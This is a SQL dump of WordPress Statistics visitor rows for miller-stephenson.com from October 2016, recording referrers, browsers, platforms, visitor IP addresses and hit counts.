INSERT INTO `wp_statistics_visitor` VALUES (6468, '2016-10-19', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=5&ved=0ahUKEwiMkIaEyufPAhUBSSYKHc8GDDQQFggyMAQ&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fkrytox%2F&usg=AFQjCNGn7PFDgABBgpzqq7KdESkbBtph0Q&bvm=bv.136499718,d.eWE', 'MSIE', 'Windows', '11.0', '', '12.11.210.203', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6469, '2016-10-19', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '69.141.137.166', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6470, '2016-10-19', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '206.121.172.34', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6471, '2016-10-19', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.11.9600.18499', '', '173.167.26.113', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6472, '2016-10-19', 'https://www.google.com/', 'Edge', 'Windows', '14.14393', '', '73.81.21.11', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6473, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '5.189.197.107', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6474, '2016-10-19', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '47.0.2526.106', '', '74.7.74.158', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6475, '2016-10-19', 'https://www.bing.com/', 'Edge', 'Windows', '13.10586', '', '97.67.134.114', '000', 15, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6476, '2016-10-19', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '8.0', '', '176.10.104.243', '000', 12, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6477, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '89.169.203.67', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6478, '2016-10-19', 'https://www.google.com/', 'Chrome', 'Windows', '39.0.2171.95', '', '65.51.166.50', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6479, '2016-10-19', 'https://www.miller-stephenson.com', 'Installatron', 'Unknown', 'Unknown', '', '104.238.94.202', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6480, '2016-10-19', 'https://www.miller-stephenson.com/wp/wp-cron.php?doing_wp_cron=1476905586.1908409595489501953125', 'WordPress', 'Unknown', '4.6.1', '', '104.238.94.202', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6481, '2016-10-19', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=3&ved=0ahUKEwj354-HzufPAhXMFT4KHVVxAuEQFggwMAI&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fthe-chemours-company-selects-wilmington-delaware-for-its-global-headquarters%2F&usg=AFQjCNGWxdaBgIfz1aCWEBgkOJrXQrXXxA&bvm=bv.135974163,d.cWw', 'MSIE', 'Windows', '11.0', '', '164.109.47.61', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6482, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '95.72.8.86', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6483, '2016-10-19', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '67.20.210.203', '000', 13, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6484, '2016-10-19', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '209.99.46.67', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6485, '2016-10-19', 'https://www.miller-stephenson.com/chemicals/conformal-coatings/', 'Safari', 'iPhone', '7.0', '', '131.253.27.127', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6486, '2016-10-19', 'https://buynorxx.com/', 'MSIE', 'Windows', '6.0', '', '46.118.118.216', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6487, '2016-10-19', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '68.115.126.153', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6488, '2016-10-19', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '75.147.6.105', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6489, '2016-10-19', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '130.74.180.133', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6490, '2016-10-19', 'https://www.google.pl/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwib1K2u0ufPAhXBNj4KHaBlDsEQFghLMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2F157-fsh%2F&usg=AFQjCNG6907cmmzzDl-JT3Pe2PXGLVrQgg&bvm=bv.135974163,d.cWw', 'MSIE', 'Windows', '11.0', '', '140.180.248.117', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6491, '2016-10-19', 'https://www.google.com', 'Firefox', 'Windows', '45.0', '', '134.223.230.151', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6492, '2016-10-19', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.52.104', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6493, '2016-10-19', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.53.144', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6494, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '37.79.249.50', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6495, '2016-10-19', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '52.192.139.33', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6496, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '46.138.223.35', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6497, '2016-10-19', 'https://www.bing.com/search?q=concrete+resin&form=MSNH14&sc=8-4&sp=-1&qs=n&sk=', 'MSIE', 'Windows', '9.0', '', '204.79.180.230', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6498, '2016-10-19', 'https://www.miller-stephenson.com/chemicals/epoxy-resins/epon-epoxy-resin/epon-epoxy-novolac-resins/', 'MSIE', 'Windows', '9.0', '', '204.79.180.111', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6499, '2016-10-19', 'https://www.miller-stephenson.com', 'Mechanize', 'Unknown', '2.7.3', '', '172.246.252.224', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6500, '2016-10-19', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '64.125.105.232', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6501, '2016-10-19', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=4&ved=0CDMQFjAG&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fchemicals%2Fkrytox-tribosys-finish-line%2Fkrytox-lubricants%2F&ei=hNIHWP7NMJ7n0QbdUA&usg=AFQjCNFJMcZt6xCpXzcHAOYSpI7Q31y8hg', 'MSIE', 'Windows', '11.0', '', '66.249.88.155', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6502, '2016-10-19', 'https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/krytox-lubricants/', 'MSIE', 'Windows', '11.0', '', '66.249.88.154', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6503, '2016-10-19', 'https://www.google.ca/', 'Chrome', 'Windows', '53.0.2785.143', '', '128.233.8.81', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6504, '2016-10-19', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '213.254.241.4', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6505, '2016-10-19', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '10.0', '', '71.235.108.218', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6506, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '178.44.74.80', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6507, '2016-10-19', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '104.182.58.111', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6508, '2016-10-19', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '68.5.162.187', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6509, '2016-10-19', 'https://www.google.nl/', 'Chrome', 'Windows', '53.0.2785.143', '', '92.110.238.142', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6510, '2016-10-19', 'https://www.google.com/', 'Chrome', 'Chrome OS', '53.0.2785.154', '', '98.174.231.162', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6511, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '86.99.27.22', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6512, '2016-10-19', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '96.11.180.26', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6513, '2016-10-19', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '12.46.184.20', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6514, '2016-10-19', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '10.0.1.87', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6515, '2016-10-19', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '99.164.188.39', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6516, '2016-10-19', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '50.158.45.92', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6517, '2016-10-19', 'https://www.google.com', 'Firefox', 'Linux', '38.0', '', '149.37.1.250', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6518, '2016-10-19', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '67.108.10.228', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6519, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '83.171.108.27', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6520, '2016-10-19', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '137.78.4.167', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6521, '2016-10-19', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '68.70.212.2', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6522, '2016-10-19', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&cad=rja&uact=8&ved=0ahUKEwiBocKT4ufPAhWCHD4KHZZPCl8QFggnMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fkrytox-gpl-205%2F&usg=AFQjCNHwZ2VkQ2EkLZn-9yjL6I2BINcdgA&bvm=bv.135974163,d.cWw', 'MSIE', 'Windows', '11.0', '', '192.251.84.3', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6523, '2016-10-19', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '54.190.36.117', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6524, '2016-10-19', 'https://www.google.com.uy/', 'Chrome', 'Windows', '53.0.2785.143', '', '200.40.182.150', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6525, '2016-10-19', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '66.60.157.77', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6526, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Linux', '47.0', '', '216.119.142.90', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6527, '2016-10-19', 'https://www.bing.com/', 'Edge', 'Windows', '14.14393', '', '64.245.43.171', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6528, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '85.173.87.46', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6529, '2016-10-19', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '66.60.157.77', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6530, '2016-10-19', 'https://www.miller-stephenson.com', 'Safari', 'Macintosh', '9.1.2', '', '23.242.120.236', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6531, '2016-10-19', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '70.39.157.194', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6532, '2016-10-19', 'https://www.google.co.uk/', 'Safari', 'iPhone', '10.0', '', '86.9.99.65', '000', 12, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6533, '2016-10-19', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '64.71.10.58', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6534, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '84.253.89.186', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6535, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '49.0', '', '193.227.78.66', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6536, '2016-10-19', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '47.138.212.52', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6537, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '36.0', '', '45.41.60.165', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6538, '2016-10-19', 'https://www.google.es/', 'Safari', 'Macintosh', '10.0', '', '83.38.235.146', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6539, '2016-10-19', 'https://www.google.com/', 'Safari', 'iPhone', '10.0', '', '71.187.35.12', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6540, '2016-10-19', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '67.51.224.50', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6541, '2016-10-19', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '12.124.22.30', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6542, '2016-10-19', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '4.79.123.0', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6543, '2016-10-19', 'https://www.google.com/aclk?sa=L&ai=DChcSEwi0sKjM6-fPAhUPiX4KHX62CZQYABAA&ei=bOkHWJrMNMis0gLf456ACA&sig=AOD64_0eor-ddoOIngFO-n2z4t9sdLUWNw&rct=j&q=&sqi=2&ved=0ahUKEwiasqXM6-fPAhVIllQKHd-xB4AQ0QwIGg&adurl=', 'MSIE', 'Windows', '11.0', '', '108.206.93.103', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6544, '2016-10-19', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.54.109', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6545, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '92.124.138.219', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6546, '2016-10-19', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '73.181.56.209', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6547, '2016-10-19', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.59', '', '134.20.11.89', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6548, '2016-10-19', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '128.111.82.132', '000', 26, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6549, '2016-10-19', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '173.49.102.42', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6550, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '195.88.17.192', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6551, '2016-10-19', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '70.39.157.193', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6552, '2016-10-19', 'https://www.miller-stephenson.com/chemicals/conformal-coatings/', 'Chrome', 'Windows', '48.0.2564.97', '', '91.200.12.106', '000', 16, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6553, '2016-10-19', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '220.181.51.103', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6554, '2016-10-19', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '4.79.123.1', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6555, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '93.84.0.24', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6556, '2016-10-19', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '24.115.38.69', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6557, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '125.161.106.210', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6558, '2016-10-19', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '70.39.157.195', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6559, '2016-10-19', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '54.190.57.148', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6560, '2016-10-19', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '44.0.2403.125', '', '131.242.134.197', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6561, '2016-10-19', 'https://www.miller-stephenson.com/chemicals/conformal-coatings/', 'Chrome', 'Windows', '48.0.2564.116', '', '91.200.12.106', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6562, '2016-10-19', 'https://www.miller-stephenson.com/chemicals/conformal-coatings/', 'Firefox', 'Windows', '43.0', '', '91.200.12.143', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6563, '2016-10-19', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '54.0.2840.59', '', '139.144.10.10', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6564, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '188.247.43.142', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6565, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '95.153.128.108', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6566, '2016-10-19', 'https://www.google.com.mx/', 'Chrome', 'Android', '39.0.0.0', '', '189.169.97.48', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6567, '2016-10-19', 'https://www.google.com.mx/', 'Chrome', 'Windows', '53.0.2785.143', '', '200.77.217.99', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6568, '2016-10-19', 'https://www.miller-stephenson.com/chemicals/conformal-coatings/', 'Chrome', 'Windows', '47.0.2526.111', '', '91.200.12.143', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6569, '2016-10-19', 'https://www.miller-stephenson.com/chemicals/conformal-coatings/', 'Chrome', 'Windows', '48.0.2564.109', '', '91.200.12.106', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6570, '2016-10-19', 'https://mmr.mschem.com/', 'Opera', 'Windows', '12.16', '', '119.128.175.186', '000', 18, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6571, '2016-10-19', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '201.113.138.164', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6572, '2016-10-19', 'https://www.miller-stephenson.com/krytox/', 'Safari', 'iPhone', '7.0', '', '65.55.210.192', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6573, '2016-10-19', 'https://www.google.nl/url?sa=t&rct=j&q=&esrc=s&source=web&cd=4&ved=0CDAQFjAD&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&ei=CAUIWMKJBKGolgG5iQE&usg=AFQjCNHxnbsHStAmxlL8lgFEVO4LEwORVw', 'MSIE', 'Windows', '11.0', '', '66.249.88.30', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6574, '2016-10-19', 'https://www.google.nl/url?sa=t&rct=j&q=&esrc=s&source=web&cd=4&ved=0CDAQFjAD&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&ei=CAUIWMKJBKGolgG5iQE&usg=AFQjCNHxnbsHStAmxlL8lgFEVO4LEwORVw', 'MSIE', 'Windows', '11.0', '', '66.249.88.23', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6575, '2016-10-19', 'https://www.miller-stephenson.com/', 'MSIE', 'Windows', '11.0', '', '66.249.88.19', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6576, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '62.176.7.182', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6577, '2016-10-19', 'https://www.miller-stephenson.com', 'Safari', 'iPad', '10.0', '', '96.39.210.60', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6578, '2016-10-19', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.53.158', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6579, '2016-10-19', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.50.190', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6580, '2016-10-20', 'https://www.miller-stephenson.com/wp-admin/admin.php?page=quoteup-details-new', 'Chrome', 'Windows', '53.0.2785.143', '', '107.3.95.149', '000', 323, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6581, '2016-10-20', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '34.0.1847.137', '', '192.99.147.201', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6582, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '212.164.217.158', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6583, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '45.40.253.190', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6584, '2016-10-20', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '68.53.165.80', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6585, '2016-10-20', 'https://www.miller-stephenson.com/mold-release-agents/', 'Safari', 'iPad', '10.0', '', '24.193.212.151', '000', 10, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6586, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '85.234.121.226', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6587, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '45.45.193.236', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6588, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '178.215.112.100', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6589, '2016-10-20', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '76.6.0.140', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6590, '2016-10-20', 'https://www.miller-stephenson.com/', 'Firefox', 'Windows', '3.5.0', '', '68.64.174.245', '000', 10, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6591, '2016-10-20', 'https://www.miller-stephenson.com', 'AutoHotkey', 'Unknown', 'Unknown', '', '173.169.43.188', '000', 12, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6592, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '178.69.157.210', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6593, '2016-10-20', 'https://globalwits.globalsou.com/crawl/searchResult.asp?id=55922', 'Chrome', 'Windows', '45.0.2454.101', '', '27.223.28.58', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6594, '2016-10-20', 'https://www.google.com.pk/', 'Chrome', 'Windows', '45.0.2454.101', '', '67.198.135.35', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6595, '2016-10-20', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '53.0.2785.143', '', '76.69.128.25', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6596, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '36.69.232.9', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6597, '2016-10-20', 'https://www.google.ca/', 'Chrome', 'Windows', '53.0.2785.116', '', '96.43.225.203', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6598, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '1.5', '', '217.174.192.132', '000', 119, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6599, '2016-10-20', 'https://l.facebook.com/lsr.php?u=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fepoxy-stripping-agent&ext=1476927109&hash=Acmqehok5qLRTG6yTlKJy23LyClKiqeLC5a2nwBSXGOGVQ', 'Chrome', 'Windows', '53.0.2785.143', '', '66.220.145.244', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6600, '2016-10-20', 'https://www.miller-stephenson.com/product/epoxy-stripping-agent/', 'Chrome', 'Windows', '53.0.2785.143', '', '66.220.145.246', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6601, '2016-10-20', 'https://www.facebook.com/', 'Chrome', 'Macintosh', '53.0.2785.143', '', '69.159.143.2', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6602, '2016-10-20', 'https://www.miller-stephenson.com/krytox/?print=y', 'MSIE', 'Windows', '9.0', '', '182.118.20.166', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6603, '2016-10-20', 'https://www.google.com/', 'Edge', 'Windows', '13.10586', '', '47.137.100.44', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6604, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '93.84.0.24', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6605, '2016-10-20', 'https://www.miller-stephenson.com', 'Java', 'Unknown', '1.6.0', '', '51.175.135.105', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6606, '2016-10-20', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '54.254.239.95', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6607, '2016-10-20', 'https://www.google.com/aclk?sa=L&ai=DChcSEwiO29z-oujPAhWOWoYKHU5xBZ4YABAD&ei=giMIWMmAHoPimAGB-5aQDA&sig=AOD64_03vcGY2SaPmXbHdhGQJTu0VIzddQ&rct=j&q=&sqi=2&ved=0ahUKEwjJydf-oujPAhUDMSYKHYG9BcIQ0QwIIg&adurl=', 'MSIE', 'Windows', '11.0', '', '75.1.218.233', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6608, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '210.186.222.79', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6609, '2016-10-20', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.53.147', '000', 1, 0); 
